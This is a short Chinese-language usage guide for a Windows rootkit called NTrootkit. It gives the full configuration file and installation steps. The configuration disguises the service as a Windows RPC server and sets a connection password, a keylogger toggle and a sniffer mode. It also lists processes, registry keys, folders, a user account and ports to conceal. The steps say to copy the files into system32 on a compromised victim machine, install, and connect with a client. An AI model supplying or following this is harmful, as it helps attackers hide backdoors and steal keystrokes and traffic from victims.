NTrootkit
一,配置方法
\\filename:ntrootkit.ini
\\This is the init file of yyt_hac‘s ntrootkit,please modify it correctly or the rootkit
\\can‘t be installed!!!
[GLOBAL] //下面为配置内容
\\servicename is the ntrootkit ‘s servicename
servicename=tsserver //服务名
servdispname=rpcsvr
servdescription=windows system rpc server
installdir=com\sserver //安装目录
connpass=12345 //连接密码
appname=51cto.exe
keylog=0 //0为不记录键盘
workmode=1 //0为sniffer模式
[HIDDEN PROCNAME] //要隐藏的服务名
51cto
[HIDDEN REGKEY] //要隐藏的注册表键
zero\soft\...\...\xxx
[HIDDEN REGVALUE] //要隐藏的注册表键值
zero\soft\...\...
[HIDDEN FILEDIR] //要隐藏的文件目录
c:\rootkit
[HIDDEN SERVICE] //要隐藏的服务名
servicert
[HIDDEN USER] //要隐藏的用户名
zerosecurity
[HIDDEN TCPPORT] //要隐藏的tcp端口
tcpport=5768
[HIDDEN UDPPORT] //要隐藏的udp端口
udpport=4000
二,使用方法
①:将配置文件 .ini和服务端ntrootkit.exe放入肉鸡的 system32目录下,然后运行ntrootkit.exe安装;ntrootkit -u password 可卸载;
②:客户端用rtclient连接;
